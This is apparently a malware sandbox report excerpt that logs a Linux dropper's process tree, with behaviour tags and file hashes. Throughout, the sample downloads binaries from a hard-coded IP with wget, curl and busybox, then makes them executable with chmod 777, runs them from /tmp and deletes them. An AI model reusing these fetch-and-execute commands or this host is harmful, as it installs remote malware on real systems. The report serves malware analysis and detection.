/bin/rmrm OgWa8W4umUWs0rt8yF2ZaMSbqMbLzbk5HF2⤵PID:941
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/6C4Nj4QmG9ogiGA2K38S3gGbDdVoYJ2EI62⤵PID:942
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/6C4Nj4QmG9ogiGA2K38S3gGbDdVoYJ2EI62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:943
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/6C4Nj4QmG9ogiGA2K38S3gGbDdVoYJ2EI62⤵PID:944
-
-
/bin/chmodchmod 777 6C4Nj4QmG9ogiGA2K38S3gGbDdVoYJ2EI62⤵
- File and Directory Permissions Modification
PID:945
-
-
/tmp/6C4Nj4QmG9ogiGA2K38S3gGbDdVoYJ2EI6./6C4Nj4QmG9ogiGA2K38S3gGbDdVoYJ2EI62⤵
- Executes dropped EXE
PID:946
-
-
/bin/rmrm 6C4Nj4QmG9ogiGA2K38S3gGbDdVoYJ2EI62⤵PID:947
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/iqSGe9tJUu97jfRk1pB9hieoMLlNAfEKcZ2⤵PID:948
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/iqSGe9tJUu97jfRk1pB9hieoMLlNAfEKcZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:949
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/iqSGe9tJUu97jfRk1pB9hieoMLlNAfEKcZ2⤵PID:950
-
-
/bin/chmodchmod 777 iqSGe9tJUu97jfRk1pB9hieoMLlNAfEKcZ2⤵
- File and Directory Permissions Modification
PID:951
-
-
/tmp/iqSGe9tJUu97jfRk1pB9hieoMLlNAfEKcZ./iqSGe9tJUu97jfRk1pB9hieoMLlNAfEKcZ2⤵
- Executes dropped EXE
PID:952
-
-
/bin/rmrm iqSGe9tJUu97jfRk1pB9hieoMLlNAfEKcZ2⤵PID:953
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/jjOBKDfiKujlpS6qWr7VT1zReRvQfBOqhc2⤵PID:954
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/jjOBKDfiKujlpS6qWr7VT1zReRvQfBOqhc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:955
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/jjOBKDfiKujlpS6qWr7VT1zReRvQfBOqhc2⤵PID:956
-
-
/bin/chmodchmod 777 jjOBKDfiKujlpS6qWr7VT1zReRvQfBOqhc2⤵
- File and Directory Permissions Modification
PID:957
-
-
/tmp/jjOBKDfiKujlpS6qWr7VT1zReRvQfBOqhc./jjOBKDfiKujlpS6qWr7VT1zReRvQfBOqhc2⤵
- Executes dropped EXE
PID:958
-
-
/bin/rmrm jjOBKDfiKujlpS6qWr7VT1zReRvQfBOqhc2⤵PID:959
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/b19unbkHRGiN2o64Cz17DdwoJSoYBebDgI2⤵PID:960
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/b19unbkHRGiN2o64Cz17DdwoJSoYBebDgI2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:961
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/b19unbkHRGiN2o64Cz17DdwoJSoYBebDgI2⤵PID:962
-
-
/bin/chmodchmod 777 b19unbkHRGiN2o64Cz17DdwoJSoYBebDgI2⤵
- File and Directory Permissions Modification
PID:963
-
-
/tmp/b19unbkHRGiN2o64Cz17DdwoJSoYBebDgI./b19unbkHRGiN2o64Cz17DdwoJSoYBebDgI2⤵
- Executes dropped EXE
PID:964
-
-
/bin/rmrm b19unbkHRGiN2o64Cz17DdwoJSoYBebDgI2⤵PID:965
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/AGUuA9iN6RBR5CU9te2xtdLJ0YBHFEdyqh2⤵PID:966
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/AGUuA9iN6RBR5CU9te2xtdLJ0YBHFEdyqh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:967
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/AGUuA9iN6RBR5CU9te2xtdLJ0YBHFEdyqh2⤵PID:968
-
-
/bin/chmodchmod 777 AGUuA9iN6RBR5CU9te2xtdLJ0YBHFEdyqh2⤵
- File and Directory Permissions Modification
PID:969
-
-
/tmp/AGUuA9iN6RBR5CU9te2xtdLJ0YBHFEdyqh./AGUuA9iN6RBR5CU9te2xtdLJ0YBHFEdyqh2⤵
- Executes dropped EXE
PID:970
-
-
/bin/rmrm AGUuA9iN6RBR5CU9te2xtdLJ0YBHFEdyqh2⤵PID:971
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/wZBbC9s74pBfdZDQYKSx8jRERVKHpk3DRb2⤵PID:972
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/wZBbC9s74pBfdZDQYKSx8jRERVKHpk3DRb2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:973
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/wZBbC9s74pBfdZDQYKSx8jRERVKHpk3DRb2⤵PID:974
-
-
/bin/chmodchmod 777 wZBbC9s74pBfdZDQYKSx8jRERVKHpk3DRb2⤵
- File and Directory Permissions Modification
PID:975
-
-
/tmp/wZBbC9s74pBfdZDQYKSx8jRERVKHpk3DRb./wZBbC9s74pBfdZDQYKSx8jRERVKHpk3DRb2⤵
- Executes dropped EXE
PID:976
-
-
/bin/rmrm wZBbC9s74pBfdZDQYKSx8jRERVKHpk3DRb2⤵PID:977
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/7IyD2XS6FXAkhOocotGR8tpsMG80pLpZwT2⤵PID:978
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/7IyD2XS6FXAkhOocotGR8tpsMG80pLpZwT2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:979
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/7IyD2XS6FXAkhOocotGR8tpsMG80pLpZwT2⤵PID:980
-
-
/bin/chmodchmod 777 7IyD2XS6FXAkhOocotGR8tpsMG80pLpZwT2⤵
- File and Directory Permissions Modification
PID:981
-
-
/tmp/7IyD2XS6FXAkhOocotGR8tpsMG80pLpZwT./7IyD2XS6FXAkhOocotGR8tpsMG80pLpZwT2⤵
- Executes dropped EXE
PID:982
-
-
/bin/rmrm 7IyD2XS6FXAkhOocotGR8tpsMG80pLpZwT2⤵PID:983
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97